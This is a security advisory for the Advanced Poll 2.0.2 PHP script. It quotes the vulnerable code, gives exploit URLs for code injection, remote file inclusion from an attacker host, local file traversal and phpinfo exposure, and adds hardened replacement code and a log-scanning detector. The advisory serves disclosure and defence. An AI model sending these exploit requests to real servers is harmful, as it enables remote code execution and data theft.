
Advanced Poll : PHP Code Injection, File Include, Phpinfo



Information :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
   if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
       eval("\$$register_poll_vars[$i] = \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
   } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
       eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
   } else {
       eval("\$$register_poll_vars[$i] = '';");
   }
}
[...]
------------------------------------------------------------------------------------------------------
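The loop above builds PHP source text out of the raw request value and hands it to eval(), so a value that contains a double quote closes the string literal and whatever follows is executed as code. The hardened counterpart below is an added example, not code from Advanced Poll: it registers the same three variables by plain assignment, with no eval() at all. It uses the $_GET/$_POST superglobals instead of $HTTP_GET_VARS/$HTTP_POST_VARS; the poll_request_var() helper and the per-variable validation patterns are assumptions made for this example.

```php
<?php
// Added example (not Advanced Poll's own code): the same "register a few
// request variables" step as comments.php, without eval().
//
// The original builds PHP source from the raw request value and eval()s it,
// so a value containing a double quote terminates the string literal and
// the remainder of the value runs as code. Assigning the value directly
// (and validating it) removes that code path entirely.

// Variable names come from the excerpt above; the validation rules are
// assumptions for this example, not the project's.
$register_poll_vars = array(
    'id'           => '/^[0-9]{1,10}$/',         // numeric poll id
    'template_set' => '/^[A-Za-z0-9_-]{1,32}$/', // directory-safe name
    'action'       => '/^[a-z_]{1,32}$/',        // short keyword
);

/**
 * Return the validated value of one request variable, or '' when it is
 * absent or fails validation. POST wins over GET, as in the original.
 */
function poll_request_var($name, $pattern)
{
    if (isset($_POST[$name])) {
        $raw = $_POST[$name];
    } elseif (isset($_GET[$name])) {
        $raw = $_GET[$name];
    } else {
        return '';
    }
    if (!is_string($raw)) {      // arrays (id[]=...) are rejected outright
        return '';
    }
    $raw = trim($raw);
    return preg_match($pattern, $raw) === 1 ? $raw : '';
}

// Plain assignments: the request value is data and is never parsed as code.
$id           = poll_request_var('id',           $register_poll_vars['id']);
$template_set = poll_request_var('template_set', $register_poll_vars['template_set']);
$action       = poll_request_var('action',       $register_poll_vars['action']);
```

The allowlist patterns are deliberately narrow; a value that does not fit falls back to the same empty string the original assigns when the parameter is missing, so the rest of comments.php sees no new states.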



booth.php, png.php :

---------------------------------------------------------------
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
   $include_path = ".";
}

if (!isset($PHP_SELF)) {
   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
   $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
   if (isset($HTTP_GET_VARS)) {
       while (list($name, $value)=each($HTTP_GET_VARS)) {
           $$name=$value;
       }
   }
   if (isset($HTTP_POST_VARS)) {
       while (list($name, $value)=each($HTTP_POST_VARS)) {
           $$name=$value;
       }
   }
   if(isset($HTTP_COOKIE_VARS)){
       while (list($name, $value)=each($HTTP_COOKIE_VARS)){
           $$name=$value;
       }
   }
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------


poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------




admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
   $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
   if (isset($HTTP_GET_VARS)) {
       while (list($name, $value)=each($HTTP_GET_VARS)) {
           $$name=$value;
       }
   }
   if (isset($HTTP_POST_VARS)) {
       while (list($name, $value)=each($HTTP_POST_VARS)) {
           $$name=$value;
       }
   }
   if(isset($HTTP_COOKIE_VARS)){
       while (list($name, $value)=each($HTTP_COOKIE_VARS)){
           $$name=$value;
       }
   }
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
   include ("$base_path/lang/$pollvars[lang]");
} else {
   include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------
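In common.inc.php the include path is assembled from $base_path and $pollvars['lang'], and both can be set from the request, either directly by register_globals or by the $$name loop shown above. The version below is an added example and not code from Advanced Poll: it derives $base_path from the file's own location and reduces the requested language to a bare file name that must resolve inside the lang/ directory. The poll_lang_file() helper, the use of $_GET/$_POST instead of $HTTP_*_VARS, and the file-name pattern are assumptions for this example.

```php
<?php
// Added example (not Advanced Poll's own code): choosing the language file
// in admin/common.inc.php without letting the request control the path.
//
// Two changes versus the excerpt above:
//  1. $base_path is derived from the file's own location, so neither
//     register_globals nor a manual $$name loop can overwrite it.
//  2. The language name is reduced to a bare file name and must exist
//     inside lang/; '..' and URLs can never reach include().

$base_path = dirname(dirname(__FILE__));   // parent of admin/
$lang_dir  = realpath($base_path . '/lang');
if ($lang_dir === false) {
    exit('lang directory not found');      // misconfiguration, not user input
}

/**
 * Resolve a requested language file to an absolute path inside $lang_dir,
 * or return the English default when the request is missing or unsafe.
 */
function poll_lang_file($lang_dir, $requested)
{
    $default = $lang_dir . DIRECTORY_SEPARATOR . 'english.php';
    if (!is_string($requested) || $requested === '') {
        return $default;
    }
    // basename() strips every directory component, including '../' and
    // any 'http://host/' prefix.
    $name = basename($requested);
    if (preg_match('/^[a-z_]+\.php$/', $name) !== 1) {
        return $default;
    }
    $candidate = realpath($lang_dir . DIRECTORY_SEPARATOR . $name);
    // realpath() is false for a missing file; the prefix check also catches
    // a symlink inside lang/ that points outside it.
    if ($candidate === false ||
        strpos($candidate, $lang_dir . DIRECTORY_SEPARATOR) !== 0) {
        return $default;
    }
    return $candidate;
}

// Read pollvars[lang] from the request explicitly instead of relying on
// register_globals; anything that is not a plain string is ignored.
$requested_lang = '';
if (isset($_POST['pollvars']['lang'])) {
    $requested_lang = $_POST['pollvars']['lang'];
} elseif (isset($_GET['pollvars']['lang'])) {
    $requested_lang = $_GET['pollvars']['lang'];
}

include poll_lang_file($lang_dir, $requested_lang);
```

Because $base_path is computed before any request data is read and is never reassigned, the remote include via base_path= and the traversal via pollvars[lang]= described later in this advisory both collapse to the English default.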


In the /admin/ directory, the following files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

all contain :

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------


misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------


Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not a mistake : the manual registration loop in booth.php runs only when $PHP_SELF is not already a global, i.e. when register_globals is OFF) :

http://[target]/booth.php?include_path=http://[attacker] (or the same request against png.php, poll_ssi.php or popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work whether register_globals is ON or OFF :

http://[target]/admin/common.inc.php?base_path=http://[attacker] will include the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
Also with register_globals=OFF, and again through all the files listed above, the url http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view will include the local file http://[target]/admin/../../../file/to/view


- http://[target]/misc/info.php will show the phpinfo().
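For anyone running this version, the request shapes above are also easy to spot in a web server access log. The scanner below is an added example and not part of this advisory: it decodes each request line and flags the remote include, base_path override, lang traversal, quote-based injection into the eval()'d parameters, and hits on misc/info.php. The log lines are constructed for this example (common log format, with the advisory's own [PHPCODE] and file/to/view placeholders), and the rule set and scan_poll_log() helper are assumptions.

```php
<?php
// Added example (not part of the advisory): flag requests in an access log
// that match the request shapes described in the exploits section.
// The sample lines below are constructed for this example.

$sample_log = <<<'LOG'
10.0.0.5 - - [01/Jan/2004:10:00:00 +0000] "GET /poll/booth.php?id=1 HTTP/1.1" 200 1523
10.0.0.7 - - [01/Jan/2004:10:00:02 +0000] "GET /poll/booth.php?include_path=http://203.0.113.9 HTTP/1.1" 200 88
10.0.0.7 - - [01/Jan/2004:10:00:03 +0000] "GET /poll/admin/common.inc.php?base_path=..&pollvars%5Blang%5D=../../../file/to/view HTTP/1.1" 200 1201
10.0.0.7 - - [01/Jan/2004:10:00:05 +0000] "GET /poll/comments.php?id=%22;[PHPCODE]// HTTP/1.1" 200 4021
10.0.0.9 - - [01/Jan/2004:10:00:06 +0000] "GET /poll/misc/info.php HTTP/1.1" 200 40210
LOG;

// Each rule is a label and a regex applied to the URL-decoded request line.
$rules = array(
    'remote-include' => '~/(booth|png|poll_ssi|popup)\.php\?.*\binclude_path=[a-z]+://~i',
    'base-path'      => '~/admin/[a-z_.]+\.php\?.*\bbase_path=~i',
    'lang-traversal' => '~pollvars\[lang\]=[^&]*\.\./~i',
    'eval-injection' => '~/comments\.php\?.*\b(id|template_set|action)=[^&]*"~',
    'phpinfo'        => '~/misc/info\.php~',
);

/**
 * Return one array(client_ip, label, request) per matching rule and line.
 * A single line can produce several hits (e.g. base-path + lang-traversal).
 */
function scan_poll_log($log, $rules)
{
    $hits = array();
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Common log format: ip ident user [date] "request" status bytes
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"/', $line, $m)) {
            continue;                     // not a CLF line, skip it
        }
        $ip      = $m[1];
        $request = urldecode($m[2]);      // %22 -> ", %5B -> [, %2e -> .
        foreach ($rules as $label => $pattern) {
            if (preg_match($pattern, $request) === 1) {
                $hits[] = array($ip, $label, $request);
            }
        }
    }
    return $hits;
}

foreach (scan_poll_log($sample_log, $rules) as $hit) {
    printf("%-10s %-15s %s\n", $hit[0], $hit[1], $hit[2]);
}
```

Decoding before matching matters: the same traversal can be sent as `../`, `%2e%2e/` or with the brackets of pollvars[lang] encoded, and a rule applied to the raw line would miss those variants. The first sample line, a normal poll view, produces no hit.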


Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info.


Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info
